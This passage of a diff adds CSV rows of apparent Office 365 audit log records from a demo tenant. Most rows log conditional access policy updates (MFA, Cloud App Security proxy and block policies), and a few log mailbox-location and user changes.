+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 2:48:55 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T02:48:55Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 2:48:55 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T02:48:55Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 2:48:55 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T06:02:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 6:02:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T06:02:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 6:02:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T06:02:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 6:02:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T22:09:32Z,,,Remove-MailboxLocation,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\581f5f2c-227e-41b1-a3ac-8fe88c8a9812""
+  },
+  {
+    ""Name"": ""IgnoreLegalHold"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Confirm"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-04-30T22:09:56Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-04-17T03:29:27Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 3:29:27 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-17T03:29:26Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 3:29:26 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T03:29:26Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 3:29:25 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T03:29:25Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 3:29:25 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T03:29:24Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 3:29:24 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T03:29:24Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 3:29:23 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T03:29:26Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 3:29:26 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T03:29:25Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 3:29:24 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T03:29:27Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 3:29:27 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T03:29:26Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 3:29:26 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T03:29:25Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 3:29:25 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T03:29:27Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 3:29:27 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T03:29:25Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 3:29:25 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T06:13:20Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 6:13:20 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T06:13:18Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 6:13:18 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T06:13:20Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 6:13:20 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T06:13:19Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 6:13:19 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T06:13:19Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 6:13:19 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T06:13:19Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
